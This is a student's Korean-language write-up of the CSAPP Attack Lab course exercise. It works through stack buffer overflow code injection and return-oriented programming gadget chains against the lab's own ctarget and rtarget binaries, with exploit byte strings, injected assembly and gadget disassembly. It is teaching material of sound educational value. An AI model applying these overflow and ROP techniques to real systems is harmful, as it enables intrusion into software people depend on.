CSAPP Attack Lab

📝 상세 정리

#

Part I: Code Injection Attacks

#

• 새로운 코드를 인젝션하지는 않고, string을 직접 박아넣어서 존재하는 프로시져로 꽂을것이다.

  void test()
  {
  	int val;
  	val = getbuf();
  	printf("No exploit. Getbuf returned 0x%x\n", val);
  }

• 위와 같은 코드에 직접 넣을 예정

Level 1

#

• void touch1() 함수로 가게 만들자.

  00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	call   401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	ret
  4017be:	90                   	nop
  4017bf:	90                   	nop

• getbuf 함수를 보니, 0x28 = 40바이트를 스택메모리에 할당하고, get함수를 부른다.

• 그렇다면 sub가 지난 이후 40바이트 위에는 getbuf가 끝나고 돌아가야할 함수 위치가 있을 것이다!

    00000000004017c0 <touch1>:
    4017c0:	48 83 ec 08          	sub    $0x8,%rsp
    4017c4:	c7 05 0e 2d 20 00 01 	movl   $0x1,0x202d0e(%rip)        # 6044dc <vlevel>
    4017cb:	00 00 00 
    4017ce:	bf c5 30 40 00       	mov    $0x4030c5,%edi
    4017d3:	e8 e8 f4 ff ff       	call   400cc0 <puts@plt>
    4017d8:	bf 01 00 00 00       	mov    $0x1,%edi
    4017dd:	e8 ab 04 00 00       	call   401c8d <validate>
    4017e2:	bf 00 00 00 00       	mov    $0x0,%edi
    4017e7:	e8 54 f6 ff ff       	call   400e40 <exit@plt>

• touch함수의 위치는 다음과 같이 0x4017c0번이다.

• 따라서 40바이트 뒤의 ret주소를 조작하자. string을 input받은 결과가

  00 00 00 00 (... 40개 ) c0 17 40 00 00 00 00 00 (x86-64에서는 8바이트씩 리틀엔디안으로 읽으므로)

• 를 인젝션하면 되겠다.
• 다음과 같은 내용을 넣은 exploit.txt를 만들고,

  ./hex2raw < exploit.txt > hex.txt
  ./ctarget -q < hex.txt

• 다음과 같은 코드를 통해 exploit을 수행하자.

Level 2

#

• 작은 크기의 코드를 exploit string에 넣어야 한다.
• void touch2(unsigned val) 이라는 함수를 호출해야하고, 이때 val은 cookie와 같아야한다.
• 그렇다면 touch2로 가기 전에 rdi에 cookie값이 들어가도록 해야한다는건데..
• 눈치상 mov를 쓰면 되지 않을까?
  • mov 0x59b997fa %rdi 같은걸 수행하고, touch2로 가면 되는거같은데..
    • 짧은 코드니까 스택 메모리를 좀 이용할 수 있지 않을까?

mov 0x59b997fa, %rdi
ret

• 라고 touch2.s에 쓰고,

~/CSAPP/3_Attack_Lab$ gcc -c touch2.s
~/CSAPP/3_Attack_Lab$ objdump -d touch2.o

0000000000000000 <.text>:
   0:   48 c7 c7 fa 97 b9 59    mov    $0x59b997fa,%rdi
   7:   c3                      ret

• 위와 같이 해서 hex로 바꿀 수 있다.
• 음.. 그러면 다시 스택메모리 -40쯤을 바라보게 한다음에, 거기에 저 코드를 넣고, ret를 수행하면 또 다음 블럭을 볼테니까 그 값에 touch2의 주소를 넣으면 되지 않을까?

  (gdb) x/50x $rsp
0x5561dc78:     0x00000000      0x00000000      0x00000000      0x00000000
0x5561dc88:     0x00000000      0x00000000      0x00000000      0x00000000
0x5561dc98:     0x55586000      0x00000000      0x00401976      0x00000000
0x5561dca8:     0x55685fe8      0x00000000      0x00401f24      0x00000000

• 0x28만큼 빠진 뒤다. 저기 0x00401976이 좀아까 공격한 주소고. 그러면 여기서 0x5561dc78로 보내고, 거기서 위에서 예측한 짓을 해보자. ```
  • 요건 실패했다…
  • 스택을 직접 정렬을 맞추는게 까다롭다.
    • PC역할을 하는 %rip와 스택의 %rsp는 별개니까, 직접 스택에 0x4017ec를 박아버려도 문제가 없다.

    movq $0x59b997fa, %rdi
    pushq $0x4017ec
    ret

  • 로 하고, 이케이케 잘하면 된다!!

    Type string:Touch2!: You called touch2(0x59b997fa)

    • 야호!!!

Level 3

#

• 이번에는 char *sval, 그러니까 string을 전달해야하네
• %rdi가 스트링의 주소를 가리키게 하고, 거기에 스트링을 넣어야한다
  • 넣어야하는 값은 그 쿠키값 그대로 나오게 넣어야 하는듯?
• 어떻게 하면 좋을까?
  • 제일 처음 8바이트에 우리가 필요로하는 문자열이 들어가고
  • 그 다음으로 우리가 rip를 옮길건데, 여기서 그러면 rdi에 메모리주소를 지정해주고,
  • 그리고 스택에 넣..기에는 괜찮을라나? 8칸 쓸수 있을까? 오염 안당할라나? 일단 해보자.ㅇ
    • 이걸 nop같은걸로 미는것도 가능한가?
• Level2와 같이 했지만, 결국 hexmatch함수에 의해서 오염당하는게 문제였다
  • 스택 메모리의 아랫쪽은 깊어진다면 오염당할 수 있다
  • 그렇다면 위쪽에 넣어버린다면???
  • 어차피 버퍼 오버플로우로 위쪽을 오염시켜버리는거, 안전한데 박아버리자!
• 따라서 ret 주소 뒷쪽 안전한곳에 박아두고 쓰면.. 좋아쓰!!

   Type string:Touch3!: You called touch3("59b997fa")
   Valid solution for level 3 with target ctarget
   PASS: Would have posted the following:

Part II: Return-Oriented Programming

#

• CTARGET보다 어려울 것이다.
• 3.10인가에서 배운 스택 무작위화도 쓰고, 스택에있는 명령어는 실행불가하게 할것이다.
• 하지만 이는 새로운 코드를 주입하는것 말고도 존재하는 코드를 실행하는것으로 뚫을 수 있다.
  • 이를 Return-Oriented Programing, ROP라고 부른다.
  • ret이 오는 instruction 덩어리를 잘 찾아가는 전략으로 작동한다.

  void setval_210(unsigned *p){
  	*p = 3347663060U;
  }

  • 위와 같은 코드는 다음과 같은 기계코드가 된다.

  0000000000400f15 :
  	400f15: c7 07 d4 48 89 c7 movl $0xc78948d4,(%rdi)
  	400f1b: c3 retq

  • 이때 뒤에 (48 89 c7) 만 보면, 이는 movq %rax, %rdi와 같다.
  • 이런 느낌으로도 이용할 수 있다!

Level 2

#

• gadget farm을 이용해서, 위에 Level 2에서 했던걸 똑같이 하면 된다.
• 결국 해야하는건 rdi에 값을 넣기, touch2 함수로 가기
• 음.. 값을 어떻게 넣으면 좋을까?
  • 0x6054e4 에 있는 cookie를 쓰는건 어려울거고, cookie 자체는 내가 직잡 넣는 영역일 것 같다
  • 아, 제일처음에 rsp가 보고있는 값을 넣으면 40바이트의 처음을 쓸 수 있지 않을까?? 그렇다면

    movq (%rsp), rdi
    ret

  • 이걸 넣고, 40바이트부터 touch2 주소를 넣으면 되지 않을까?

    0000000000000000 <.text>:
       0:   48 8b 3c 24             mov    (%rsp),%rdi
       4:   c3                      ret

  • 좋아. 48 8b 3c 24를 찾을수만 있다면…
    • 딱히 안보인다
  • 일단 결국 rdi로 넣어야 하니까, 48 89 어쩌구 들을 찾아보자

    00000000004019a0 <addval_273>:
      4019a0:	8d 87 48 89 c7 c3    	lea    -0x3c3876b8(%rdi),%eax
      4019a6:	c3                   	ret

    • 일단 여기서 48 89 c7 c3, 즉 movq %rax, %rdi / ret를 찾을 수 있다
    • 89 c7 c3은 movl %eax, %edi / ret 이기도 하다!
  • 아하, 값을 넣어야하는건 mov (%rsp)로도 되지만, 간단하게 popq로도 된다!!
    • popq %rax인 58이나 popq %rdi인 5f만 찾으면 된다!

    00000000004019a7 <addval_219>:
      4019a7:	8d 87 51 73 58 90    	lea    -0x6fa78caf(%rdi),%eax
      4019ad:	c3                   	ret

  • 58: popq %rax, 90: nop, c3: ret 으로 해석할 수 있지 않을까?
    • 이거랑 위에걸 조합해서 실행해보자.
  • 어.. 근데 이슈가 있다. 결국 rsp에 있는 리턴주소로 가서 실행하는건데, 그러면 스택메모리가 8바이트 땡겨지나? 그리고 movq를 하면 또 8바이트가 땡겨지나? 헷갈리네. 아마 그런거같긴 한데..

    ~/CSAPP/3_Attack_Lab$ ./rtarget -q < hex4.txt
    Cookie: 0x59b997fa
    Type string:Touch2!: You called touch2(0x59b997fa)
    Valid solution for level 2 with target rtarget
    PASS: Would have posted the following:

    • 야호! 성공했다.

Level 3

#

• ㅋㅋ 아니 Writeup 과제지에서 어려워서 일부러 점수 낮게 배점했다고 하는건 진짜 무냐.. 무서운데
  • 그래도 해야겠지?
• 앞에서 했던것과 마찬가지로 문자열을 담아야 하는데, 그 포인터 위치를 알 수가 없으니 조금 까다롭다…
  • 음, 그나마 아이디어가 있다면, 0x40(%rsp)같이 오프셋을 좀 잘 해서 안전한데에다가 데이터를 넣어둘 수 있을까?
    • 아니 근데 이건 거기있는 값인데
  • 결국 %rdi에는 안전한 스택메모리의 주소가, 그리고 그 주소에 우리가 인젝션한 문자열이 있으면 되는거같은데.
  • 그렇다면 어떻게 해야하지? add rdi가 있으면 좋을까?
    • mov rsp rdi
    • addq 0x40 rdi
    • 이런게 있으면 되지 않을까?

    0000000000401a03 <addval_190>:
      401a03:	8d 87 41 48 89 e0    	lea    -0x1f76b7bf(%rdi),%eax
      401a09:	c3                   	ret

    • 48 89 e0: movq %rsp %rax를 찾았다!
    • 이제 다른데서 값을 잘 찾아서, lea같은걸로 더해서 쓰면 되지 않을까?

    0000000000000000 <.text>:
       0:   48 8d 3c 3e             lea    (%rsi,%rdi,1),%rdi
       4:   48 8d 3c 06             lea    (%rsi,%rax,1),%rdi
       8:   48 8d 3c 38             lea    (%rax,%rdi,1),%rdi
       c:   48 8d 04 3e             lea    (%rsi,%rdi,1),%rax

    • 이런 친구들을 찾으면 되겠는디? 48 8d를 찾아보자

    00000000004019bc <setval_470>:
      4019bc:	c7 07 63 48 8d c7    	movl   $0xc78d4863,(%rdi)
      4019c2:	c3                   	ret
    
    00000000004019d6 <add_xy>:
      4019d6:	48 8d 04 37          	lea    (%rdi,%rsi,1),%rax
      4019da:	c3                   	ret

    • 이렇게 두가지가 있는것같다.
    • 뒤에께 너무 쓰기 좋아보이는데, %rdi나 %rsi에다가 아까 얻어둔 %rsp값을 넣어두고, 다른데서 아무 상수값을 하나 가져오자. 이건 %rsp같은데서 popq로 훔쳐와도 될듯?
    • movq rax rdi, movq rax rsi를 찾아와야한다.
    • rdi는 아까 찾아놨고,

    0000000000401a11 <addval_436>:
      401a11:	8d 87 89 ce 90 90    	lea    -0x6f6f3177(%rdi),%eax
      401a17:	c3                   	ret

    • 89 ce 90 90 c3이면 movl ecx esi, nop, nop, ret 이다!
    • 이제 ecx로 옮길 수 있는지 찾아보자.

    0000000000401a33 <getval_159>:
      401a33:	b8 89 d1 38 c9       	mov    $0xc938d189,%eax
      401a38:	c3                   	ret

    • 여기서 89 d1 38 c9 c3이 movl edx ecx, cmpb cl cl, ret이고
    • 그러면 edx로 보내야되는데..

    00000000004019db <getval_481>:
      4019db:	b8 5c 89 c2 90       	mov    $0x90c2895c,%eax
      4019e0:	c3                   	ret

    • 야호! 89 c2 90 c3 = movl eax, edx, nop, ret을 찾았다.
    • 이걸로 eax -> edx -> ecx -> esi 가 가능해졌다.

    ~/CSAPP/3_Attack_Lab$ ./rtarget -q < hex4.txt
    Cookie: 0x59b997fa
    Type string:Touch3!: You called touch3("59b997fa")
    Valid solution for level 3 with target rtarget

    • 위를 잘 조합하면 성공할 수 있다!! 스택메모리 주소는 64비트니까 movl같은걸로 옮겨지지 않게 조심하자.

❔질문 사항

#

🔗 참고 자료

#